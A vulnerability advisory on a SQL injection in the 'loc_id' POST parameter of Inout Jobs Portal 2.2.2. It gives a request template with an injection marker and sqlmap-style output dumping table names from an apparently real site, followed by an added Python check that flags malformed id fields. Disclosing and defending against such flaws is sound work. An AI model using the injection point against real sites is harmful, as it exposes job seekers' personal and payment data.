Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.
[ Vulnerability ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts - Nesote Technologies Private Limited
Software  : Inout Jobs Portal 2.2.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data and modification of data, and can crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
© CraCkEr 2023

Path: /index.php?page=jobs/searchresult
Method: POST
The POST parameter 'loc_id' is vulnerable to SQL injection.
+-----------------------------------------------------------+
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="search_query"
web
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
1
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="loc_id"
1[INJECT-HERE]
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="serchtype"
simple
-----------------------------245625052541747605171577107419
Content-Disposition: form-data; name="c_id"
0
-----------------------------245625052541747605171577107419
+-----------------------------------------------------------+
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[INFO] fetching tables for database: '*****_jobs_portal'
Database: *****_jobs_portal
[53 tables]
+-----------------------------------------+
| nesote_inoutscripts_company_ratereview |
| nesote_inoutscripts_homepage_banner |
| nesote_inoutscripts_users |
| nesote_jobportal_admin |
| nesote_jobportal_applied_jobs |
| nesote_jobportal_city |
| nesote_jobportal_client_logs |
| nesote_jobportal_company_size |
| nesote_jobportal_company_type |
| nesote_jobportal_companyblock |
| nesote_jobportal_contents |
| nesote_jobportal_country |
| nesote_jobportal_coverletters |
| nesote_jobportal_currency |
| nesote_jobportal_email_templates |
| nesote_jobportal_employer_details |
| nesote_jobportal_employer_feedback |
| nesote_jobportal_functional_role |
| nesote_jobportal_industry |
| nesote_jobportal_ip_012023 |
| nesote_jobportal_ip_022020 |
| nesote_jobportal_ip_032020 |
| nesote_jobportal_ip_042020 |
| nesote_jobportal_ip_082021 |
| nesote_jobportal_ip_092022 |
| nesote_jobportal_ip_102022 |
| nesote_jobportal_ip_112022 |
| nesote_jobportal_ip_122022 |
| nesote_jobportal_ipn |
| nesote_jobportal_job_types |
| nesote_jobportal_jobs |
| nesote_jobportal_jobseeker_details |
| nesote_jobportal_languages |
| nesote_jobportal_locations |
| nesote_jobportal_messages |
| nesote_jobportal_months_messages |
| nesote_jobportal_news_and_events |
| nesote_jobportal_notifications |
| nesote_jobportal_packages |
| nesote_jobportal_payment_details |
| nesote_jobportal_previous_exp |
| nesote_jobportal_qualifications |
| nesote_jobportal_resumes |
| nesote_jobportal_saved_jobs |
| nesote_jobportal_saved_resumes |
| nesote_jobportal_seekers_qualifications |
| nesote_jobportal_sent_jobalerts |
| nesote_jobportal_settings |
| nesote_jobportal_skills |
| nesote_jobportal_specifications |
| nesote_jobportal_states |
| nesote_jobportal_success_story |
| nesote_jobportal_themes |
+-----------------------------------------+
[-] Done
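
A defender-side check for the request shape shown above, as an added example (not part of the original advisory or the vendor's code): it parses a multipart/form-data body and flags `loc_id` / `c_id` values that are not plain integers or that are sent more than once. It assumes both fields are meant to be numeric ids; the function names, boundary and sample body are constructed for illustration.

```python
"""Flag malformed id fields in a multipart POST to the jobs search endpoint."""
import re
from email.parser import BytesParser
from email.policy import default

# Assumption: the application expects plain non-negative integers here.
ID_FIELDS = {"loc_id", "c_id"}
STRICT_INT = re.compile(r"[0-9]{1,10}")

def form_fields(content_type: str, body: bytes) -> list[tuple[str, str]]:
    """Parse a multipart/form-data body into (name, value) pairs, duplicates kept."""
    head = f"Content-Type: {content_type}\r\n\r\n".encode()
    msg = BytesParser(policy=default).parsebytes(head + body)
    pairs = []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        pairs.append((name, part.get_content().rstrip("\r\n")))
    return pairs

def findings(content_type: str, body: bytes) -> list[str]:
    """Return one finding per id field that is repeated or not a strict integer."""
    pairs = form_fields(content_type, body)
    out = []
    for name in sorted(ID_FIELDS):
        values = [v for n, v in pairs if n == name]
        if len(values) > 1:
            # The advisory's request carries c_id twice; which one the server
            # uses is ambiguous, so surface it for review.
            out.append(f"{name}: sent {len(values)} times")
        out += [f"{name}: non-integer value {v!r}" for v in values
                if not STRICT_INT.fullmatch(v)]
    return out

def build_body(fields, boundary: str) -> bytes:
    """Serialize (name, value) pairs as multipart/form-data (used for the sample)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()

# Constructed sample mirroring the field layout above; the marker is the
# advisory's own placeholder text, not a payload.
BOUNDARY = "constructed-boundary-0001"
CTYPE = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE = build_body([("search_query", "web"), ("c_id", "1"),
                     ("loc_id", "1[INJECT-HERE]"), ("serchtype", "simple"),
                     ("c_id", "0")], BOUNDARY)

if __name__ == "__main__":
    for line in findings(CTYPE, SAMPLE):
        print(line)
```

The same strict-integer rule belongs server-side as well: reject or cast the id before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.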